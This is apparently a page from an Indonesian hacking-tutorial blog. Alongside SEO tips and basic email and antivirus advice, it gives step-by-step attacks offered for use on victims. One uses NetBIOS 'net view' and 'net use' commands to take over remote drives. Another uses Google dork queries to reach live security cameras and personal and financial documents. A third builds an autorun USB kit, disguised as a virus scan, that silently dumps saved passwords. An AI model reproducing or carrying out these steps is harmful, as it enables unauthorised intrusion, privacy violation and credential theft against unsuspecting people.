Jumat, 16 April 2010

Free Backlinks “Cara Gila Untuk Mendapatkan PR 3 dalam 90 Hari”




Mendapatkan tempat pertama dalam search engine adalah impian sekaligus tujuan dari setiap bisnis rumahan yang mempunyai website. Lalu saya terpikirkan cara yang bisa dibilang gila untuk mencapai itu semua dalam waktu singkat Mau tahu gimana? Makanya lanjutkan bacanya!


Banyak sekali pemilik website yang mendapat hambatan untuk menambah baclink karena faktor kurangnya waktu dan uang. Tapi sebenarnya membangun backlink tidaklah bergantung pada waktu ataupun uang. Faktanya ada banyak cara untuk memperbanyak backlink dengan gratis. Gunakan metode yang akan saya sharing dengan Anda ini untuk mendapatkan PR 3 dalam 90 hari bahkan mungkin kurang, yah memang belum tentu sih sih bisa berjalan mulus, tapi yah tidak ada salahnya untuk dicoba.


Pertama yang Anda bisa lakukan adalah mendapatkan free backlink dengan bergabung ke dalam 5 forum yang sesuai dengan niche web/blog Anda. Setelah join ke dalam 5 forum tersebut maka selanjutnya buatlah minimal 10 posting per hari di masing-masing forum. Forum biasanya memiliki PR yang tinggi dan terindeks dengan baik oleh search engine. Lebih dari itu setiap postingmu akan sama dengan backlink berkualitas tinggi selama kamu tidak lupa untuk menaruh URLmu di signaturenya!

Sabtu, 10 April 2010

Akhirnya dapat pagerank

Powered by  MyPagerank.Net
Setelah sekian lama bersusah payah dan berusaha, akhirnya blog ini mendapat pagerank juga. Pertamanya sih nggak nyangka bakal secepat ini dapet pagerank. Awalnya temen yang ngasih tau aku, tapi aku nggak percaya. Trus aku cek sendiri, eehh ternyata bener blogku dapet pagerank1. Buat temen-temen yang blum dapet pagerank tetaplah berusaha biar blog kalian juga bisa dapet pagerank . ..

Kamis, 08 April 2010

Tips untuk menemukan aktivitas yang tidak sah pada E-mail

 

Apakah Anda menduga bahwa account email Anda diserang? Apakah Anda ingin menjaga keamanan total account email Anda dan membuatnya 100% bebas hack?  Yah, Beberapa kali account email kita mungkin sudah mendapat hack dan kita mungkin tidak menyadari hal itu. Kita mungkin percaya bahwa account email kita aman, tetapi dalam kenyataannya kami informasi pribadi dan rahasia mungkin akan jatuh ke tangan orang ketiga.


Berikut adalah beberapa tanda-tanda aktivitas yang tidak sah pada account email.
1. Email baru Anda ditandai sebagai Baca bahkan jika Anda tidak membacanya.
2. Email Anda dipindahkan ke Sampah atau bahkan dihapus secara permanen tanpa pemberitahuan.
3. Email anda sedang diteruskan ke pihak ketiga alamat email (periksa pengaturan Anda-> forwarding).
4. Alamat email sekunder Anda berubah.
Jika kamu menemukan salah satu kegiatan di atas pada account email Anda, maka itu adalah indikasi yang jelas bahwa account email Anda di-hack.

Jumat, 02 April 2010

Bagaimana Melindungi Email dari Hacker

Hari ini di posting ini saya akan mengajarkan anda bagaimana melindungi account email Anda dari hacker. Saat ini saya mendapatkan banyak email di mana sebagian besar orang mengatakan "My Email account hacked tolong bantu ...". Sekarang satu pertanyaan yang muncul dalam pikiran kita adalah: "Apakah begitu mudah untuk hack account email? ATAU Apakah begitu sulit untuk melindungi account email dari hacker? Jawaban tunggal kedua pertanyaan adalah "Tentu saja TIDAK!". Hal ini tidak mudah untuk hack email atau sulit untuk melindungi account email dari hacker.
Jika hal ini terjadi, lalu apa alasan bagi banyak orang kehilangan account mereka?
Jawabannya sangat sederhana. Mereka tidak tahu bagaimana melindungi diri dari hacker! Bahkan sebagian besar orang-orang yang kehilangan account email mereka bukan korban hacking tapi korban dari Trapping. Mereka kehilangan password mereka bukan karena mereka di-hack oleh beberapa pakar hacker tapi mereka tertipu sedemikian rupa sehingga mereka sendiri memberikan password mereka.
 Jika anda terus membaca dan Anda akan tahu ...

NetBIOS HACKING

NetBIOS HACKING ini akan memberitahu anda tentang cara me-remote computer dan memperoleh akses ke  HARD-DISK ATAU PRINTER korban. NetBIOS Hack adalah cara termudah untuk me-remote komputer.
LANGKAH-LANGKAH HACKING NetBIOS:
1. Buka Command Prompt
2. Pada command
prompt gunakan perintah"net view".  (ATAU
ANDA JUGA DAPAT MENGGUNAKAN "NB Scanner" OPSI DI "ALAT
IP "
PERANGKAT LUNAK DENGAN MEMASUKAN RANGE IP ADDRESSS.DENGAN
METODE INI KAMU DAPAT MEN-SCAN BANYAKNYA KOMPUTER YANG CONNECT).
Contoh: C: \> net view \ \ 219.64.55.112
Di atas adalah contoh untuk pengoperasian menggunakan
prompt perintah."Net view" adalah salah satu perintah netbios untuk melihat
sumber daya bersama remote computer. 219.64.55.112" adalah alamat
IP
komputer remote yang akan di-hack melalui Netbios.Kamu
harus menggantinya dengan alamat
IP
computer yang ingin kamu hack.Jika itu berhasil maka
daftar hard disk drive & printer akan muncul. Jika pesan kesalahan ditampilkan,
ulangi langkah no.2 dengan alamat IP yang berbeda.
3. Setelah berhasil, gunakan perintah"net use" di command prompt.Perintah "net use" adalah perintah netbios lain yang memungkinkan untuk remote hack drive atau printer.
Contoh-1:
C: \> net use D: \
\ 219.64.55.112 \ F
Contoh-2:
C: \> net use G: \
\ 219.64.55.112 \ SharedDocs
Contoh-3:
C: \> net use I: \
\ 219.64.55.112 \ Myprint
CATATAN:
Dalam Contoh 1,2 & 3, D:, G: & I: adalah Nama Drive
Jaringan yang akan dibuat pada komputer Anda untuk mengakses komputer remote
hard-disk.
CATATAN:
MEMBERI NAMA DRIVE YANG TIDAK DIGUNAKAN OLEH DRIVE LAINNYA TERMASUK HARD-DISK DRIVE, FLOPPY DRIVE DAN ROM-DRIVE COMPUTER. JIKA ANDA MEMILIKI C: & D: SEBAGAI HARD DRIVE, J: SEBAGAI FLOPPY DIVE DAN E : SEBAGAI CD-DRIVE, BERI M: JIKA ANDA INGIN MENGGUNAKANNYA SEBAGAI SHARED DRIVE DI COMMAND PROMPT.
 F dan"SharedDocs" adalah nama dari komputer remote hard-disk drive yang ingin Anda hack. “Myprint” is the name of remote computer's printer.These are displayed after giving “net use” command. "Myprint" adalah nama dari printer yang ada di komputer remote.Ini akan ditampilkan setelah memberikan perintah"net use".  "219.64.55.112" adalah alamat IP komputer remote yang ingin Anda hack.
4. Setelah berhasil komputer Anda akan memberikan pesan bahwa "The command completed successfully".Setelah Anda mendapatkan pesan di atas Anda hanya satu langkah dari hacking komputer.
Sekarang buka "My Computer" Anda akan melihat "Hard-Disk drive" baru
dengan nama tertentu.Kamu tentu dapat membuka dan mengakses Hard-Drive komputer
remote.Kamu dapat menyalin file, musik, folder dll dari
korban.Kamu dapat menghapus / memodifikasi data hard-drive korban
hanya jika WRITE-ACCESS diaktifkan pada system.Kamu dapat mengakses file \ folder korban dengan cepat melalui "Command Prompt".
CATATAN:
Jika Firewall Komputer Remote Diaktifkan Komputer Anda Tidak Akan Berhasil
Dalam Mendapatkan Akses Untuk Remote Computer Melalui Netbios. NetBIOS Hacking tetap dapat dilakukan Dalam Situasi ini. ( Error Message Apakah Ditampilkan). Jadi Ulangi Langkah no.2-3 Dengan IP Address Berbeda.

Bagaimana menggunakan Google untuk Hacking

Google melayani hampir 80 persen dari seluruh permintaan pencarian di Internet, membuktikan dirinya sebagai mesin pencari paling populer.. Namun Google memungkinkan untuk mencapai bukan hanya sumber informasi yang tersedia untuk publik, tetapi juga memberikan akses ke sebagian dari informasi rahasia yang seharusnya tidak pernah diungkapkan. In this post I will Dalam posting ini saya akan menunjukkan bagaimana cara menggunakan Google untuk memanfaatkan kelemahan keamanan dalam website. Berikut adalah beberapa hack yang dapat diselesaikan menggunakan Google.
1. Hacking Kamera Keamanan
Terdapat banyak kamera keamanan yang digunakan untuk memantau tempat-tempat seperti tempat parkir, kampus, lalu lintas jalan dll yang dapat di-hack menggunakan Google agar Anda dapat melihat gambar yang diambil oleh kamera mereka secara real time. Yang harus Anda lakukan adalah menggunakan permintaan pencarian di Google. Ketik di kotak pencarian Google persis seperti berikut dan tekan enter
          inurl:”viewerframe?mode=motion”
Klik pada salah satu hasil pencarian (Top 5 direkomendasikan) dan Anda akan mendapatkan akses ke kamera hidup yang penuh kontrol. Anda akan melihat sesuatu seperti berikut ini:
Seperti yang anda lihat di atas layar, Anda sekarang memiliki akses ke kamera Live yang bekerja secara real-time.Anda juga dapat memindahkan kamera di seluruh empat arah, melakukan tindakan seperti memperbesar dan memperkecil. Kamera ini memiliki refresh rate yang rendah. Tetapi ada pencarian lain di mana Anda dapat memperoleh akses ke kamera lain yang memiliki refresh rate lebih cepat. Jadi untuk mengaksesnya cukup gunakan permintaan pencarian berikut:
          intitle:”Live View / – AXIS”
Klik pada salah satu hasil pencarian untuk akses kamera yang berbeda. Dengan demikian Anda memiliki Kamera Keamanan yang di-hack menggunakan Google.
2. Hacking Data Pribadi dan Dokumen Rahasia
Menggunakan Google adalah mungkin untuk mendapatkan akses ke repositori email berisi CV dari ratusan orang yang diciptakan ketika melamar pekerjaan mereka. Dokumen-dokumen yang berisi Alamat, Telepon, DOB, Pendidikan, Pengalaman kerja dll dapat ditemukan hanya dalam hitungan detik.
          intitle:”curriculum vitae” “phone * * *” “address *” “e-mail”
Anda dapat memperoleh akses ke daftar. Xls (excel dokumen) yang berisi rincian kontak termasuk alamat email kelompok besar orang. Untuk melakukannya ketik perintah berikut di kotak pencarian dan tekan enter.
          filetype:xls inurl:”email.xls” filetype: xls inurl: "email.xls"
Juga mungkin untuk mendapatkan akses ke dokumen berpotensi berisi informasi tentang rekening bank, ringkasan keuangan dan nomor kartu kredit menggunakan permintaan pencarian berikut:
          intitle:index.of finances.xls intitle: index.of finances.xls
3. Hacking Google untuk mendapatkan akses ke Free Stuffs
Pernah bertanya-tanya bagaimana hack Google untuk musik atau ebooks gratis. Nah di sini saya akan memberikan cara untuk melakukan itu. Untuk men-download musik gratis cukup masukkan query berikut pada kotak pencarian google dan tekan enter.
          “?intitle:index.of?mp3 eminem
Sekarang Anda akan mendapatkan akses ke seluruh indeks album eminem dimana Anda dapat men-download lagu-lagu pilihan Anda. Alih-alih Eminem,Anda dapat subtitute nama album favorit Anda. Untuk mencari ebooks yang harus Anda lakukan adalah mengganti "eminem" dengan nama buku favorit Anda. Juga mengganti "mp3" dengan "pdf" atau "zip" atau "rar".
Saya harap Anda menikmati posting ini. Jangan lupa kasih komentar ya. . . .

12 tips untuk menjaga komputer bebas virus

Apakah komputer anda terinfeksi virus? Apakah anda sering mendapatkan pesan kesalahan misterius? Yah ini adalah masalah umum yang dihadapi oleh hampir semua pengguna komputer di seluruh dunia. Ada banyak virus dan worm diluar sana yang dapat menginfeksi komputer Anda. Ada yang tidak berbahaya, tetapi, mereka memiliki kapasitas untuk melakukan sejumlah hal buruk seperti menghapus semua data dari komputer Anda. Namun ada cara untuk mencegah virus jauh dari PC Anda.
 
Berikut adalah 12 tips untuk menjaga komputer bebas virus:
 
 
1. Email adalah salah satu cara umum yang digunakan komputer Anda dapat terserang virus. Sehingga selalu disarankan untuk menjauh dari SPAM. Buka email hanya mereka yang memiliki asal itu dari sumber yang terpercaya seperti yang berasal dari daftar kontak Anda. Jika Anda menggunakan email pribadi Anda sendiri host (selain gmail, yahoo, hotmail dll) maka sangat dianjurkan agar Anda menggunakan baik perangkat lunak anti-spam. Dan akhirnya janagan pernah mengklik link apapun dalam email yang berasal dari sumber yang tidak dipercaya.
   
2. USB flashdisk / pen drive adalah salah satu cara umum yang digunakan virus menyebar dengan cepat. Jadi, selalu lakukan kebiasaan yang baik untuk melakukan scan virus sebelum mengcopy data apapun ke komputer Anda. Jangan pernah double klik FLASHDISK  untuk membukanya. Lebih baik lakukan klik kanan dan pilih opsi "open". Ini adalah cara yang aman untuk membuka flashdisk.
   
3. Hati-hati tentang menggunakan MS Outlook. Pandangan yang lebih rentan terhadap worm dibandingkan program e-mail lainnya, kecuali jika Anda telah menginstall program Anti-Virus. Gunakan Pegasus atau Thunderbird (oleh Mozilla), atau program berbasis web seperti Hotmail atau Yahoo (Di Firefox).
 
4. Seperti kita semua tahu, Internet adalah sumber utama dari semua program berbahaya termasuk virus, worm, trojan dll Bahkan internet memberikan kontribusi terhadap infeksi virus hingga 80%. Jadi di sini adalah tips untuk kebiasaan surfing aman sehingga Anda dapat menangkis infeksi virus sampai tingkat maksimum.
 
Jangan klik jendela pop-up yang mengumumkan bencana tiba-tiba di kota Anda atau mengumumkan bahwa Anda telah memenangkan hadiah per jam. Itu adalah cara untuk menyesatkan pengguna internet dan Anda tidak boleh mempercayai mereka.
 
Anda juga dapat menggunakan pop-up yang secara otomatis memblokir pop-up.
   
5. Sebagian besar dari kita menggunakan mesin pencari seperti Google untuk menemukan apa yang kita cari. Hal ini cukup jelas untuk sebuah situs jahat untuk masuk dalam daftar hasil pencarian. Jadi untuk menghindari orang-orang mengunjungi situs-situs berbahaya tidak terpercaya, Anda dapat men-download dan menginstal AVG LinkScanner yang merupakan freeware. Alat ini bisa menjadi sangat berguna dan akan membantu Anda untuk menjauhi situs-situs berbahaya.
   
6. Menginstal perangkat lunak antivirus yang baik dan tetap diperbarui. Juga melakukan pemindaian sistem penuh secara berkala. Hal ini sangat disarankan agar Anda mengaktifkan fitur update otomatis. Ini adalah tugas yang paling penting untuk melindungi PC Anda dari virues. Jika keamanan PC adalah pilihan pertama Anda maka disarankan bahwa Anda pergi untuk shareware perangkat lunak antivirus yang gratis seperti di atas. Sebagian besar antivirus mendukung fitur Auto-Protect realtime yang menyediakan keamanan untuk PC Anda. Pastikan bahwa fitur ini diaktifkan.
   
7. Menginstal sebuah Antispyware,  program yang mengoperasikan internet melawan malware dan spyware.
   
8. Pernah membuka lampiran email yang berasal dari sumber yang tidak dipercaya. Jika itu adalah gambar, teks atau file suara (lampiran ini berakhir dalam ekstensi. Txt,. Jpeg,. Gif,. Bmp,. Tif,. Mp3,. Htm,. Html, dan. Avi), Anda mungkin aman , tapi masih melakukan scan sebelum pembukaan.
   
9. Jangan gunakan disk orang lain, bahkan dari tempat kerja. Disk dapat terinfeksi virus. Tentu saja, Anda dapat menjalankan scan virus terlebih dahulu untuk mengeceknya.
   
10. Set up Windows Update untuk secara otomatis men-download patch dan upgrade. Hal ini akan memungkinkan komputer Anda untuk secara otomatis mendownload update untuk kedua sistem operasi dan Internet Explorer. Pembaruan ini memperbaiki lubang keamanan di kedua buah perangkat lunak.
  
11. Meskipun Anda men-download file dari situs terpercaya / sumber seperti torrent, warez dll pastikan bahwa Anda menjalankan scan virus sebelum mengeksekusi mereka.
   
12. Dan akhirnya tidak dianjurkan untuk mengunjungi situs-situs yang menampilkan ilegal / barang-barang yang tidak diinginkan seperti patch,serials, warez dan lain-lain karena mereka menyumbang banyak dalam penyebaran virus dan program berbahaya lainnya.

Jangan lupa kasih komentar. . . . 
  


Mengendus Password memakai USB Flashdisk

Seperti yang kita semua tahu, Windows menyimpan sebagian besar password yang digunakan setiap hari, termasuk password instant messenger seperti MSN, Yahoo, AOL, Windows messenger dll. Seiring dengan ini, Windows juga menyimpan password dari Outlook Express, SMTP, POP , account FTP dan password otomatis-lengkap banyak browser seperti IE dan Firefox. Terdapat banyak alat bantu untuk memulihkan passswords ini dari tempat mereka disimpan. Menggunakan alat-alat dan USB flashdisk Anda dapat membuat rootkit Anda sendiri untuk mengendus password dari komputer manapun. Kami membutuhkan alat berikut untuk membuat rootkit kita.
MessenPass : Memulihkan password yang paling populer dari program Instant Messenger: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger yang disediakan dengan Netscape 7, Trillian, Miranda, dan Gaim.
PassView mail : Memulihkan password program email berikut: Outlook Express, Microsoft Outlook 2000 (POP3 dan SMTP Account saja), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP dan SMTP Account), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Grup Mail Gratis.
PassView mail juga dapat mengembalikan password account email berbasis web (Hotmail, Yahoo, Gmail), jika Anda menggunakan program yang terkait account tersebut.

Passview IE : IE PassView adalah utility kecil yang mengungkapkan password disimpan oleh browser Internet Explorer. Ini mendukung Internet Explorer 7.0, serta versi internet explorer, v4.0 - v6.0
Protected Storage PassView : Memulihkan semua password disimpan di dalam Penyimpanan Dilindungi, termasuk password AutoComplete Internet Explorer, password situs yang memiliki proteksi password, MSN Explorer Sandi, dan banyak lagi ...
PasswordFox : PasswordFox adalah alat kecil pemulihan sandi yang memungkinkan Anda untuk melihat nama pengguna dan password disimpan oleh Web browser Mozilla Firefox. Secara default, PasswordFox menampilkan password disimpan dalam profil Anda saat ini, tetapi Anda dapat dengan mudah dapat memilih untuk menonton password profil Firefox lainnya.  Untuk setiap entri sandi, informasi berikut ini ditampilkan: Indeks Rekam, Web Site, Nama User, Password, User Nama Field, Password Bidang, dan nama file Signons.
Berikut ini adalah langkah demi langkah untuk menciptakan password hacking toolkit:
CATATAN: Anda harus menonaktifkan sementara antivirus Anda sebelum mengikuti langkah-langkah.
1. Download semua 5 alat, ekstrak itu dan copy saja executable () exe. File ke USB flashdisk.
 yaitu: Copy files - mspass.exe, mailpv.exe, iepv.exe, pspv.exe dan passwordfox.exe ke dalam USB Drive.
2. Buat Notepad baru dan menulis teks berikut ke dalamnya
[autorun]
open=launch.bat

ACTION= Perform a Virus Scan

Simpan Notepad dan rename  dari New Text Document.txt menjadi autorun.inf
Sekarang salin file autorun.inf ke USB flashdisk Anda.

3. Buat Notepad dan copast teks berikut:
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt  
Simpan Notepad dan rename file dari New Text Document.txt menjadi launch.bat
Salin file launch.bat juga untuk USB drive Anda.

Sekarang rootkit Anda siap dan Anda siap untuk mengendus password. Anda dapat menggunakan flashdisk pada di komputer manapun untuk mengendus password yang tersimpan.. Hanya ikuti langkah-langkah:

    1. Masukkan flashdisk dan Autorun kan membuat jendela pop-up. (Ini karena, kami telah membuat sebuah flashdisk autorun).
    2. Pada jendela pop-up, pilih opsi pertama (Perform a Virus Scan).
   
3.
Sekarang semua alat password recovery diam-diam akan dijalankan di
latar belakang (Proses ini memakan waktu hampir beberapa detik).
TXT
files.
Password bisa disimpan dalam  file
TXT.

    4. Keluarkan flashdisk dan Anda akan melihat password disimpan dalam file TXT.
Hack ini bekerja pada Windows 2000, XP dan Vista
CATATAN: prosedur ini hanya akan memulihkan password disimpan (jika ada) pada Komputer.



 

Total Tayangan Laman

BANNER

Belajar Hack Copyright © 2009 Premium Blogger Dashboard Designed by SAER

WELCOME TO BELAJAR HACK | BLOG BUAT ORANG-ORANG YANG INGIN BELAJAR HACKING | TIPS TRICK | DOWNLOAD SOFTWARE GRATIS FULL VERSION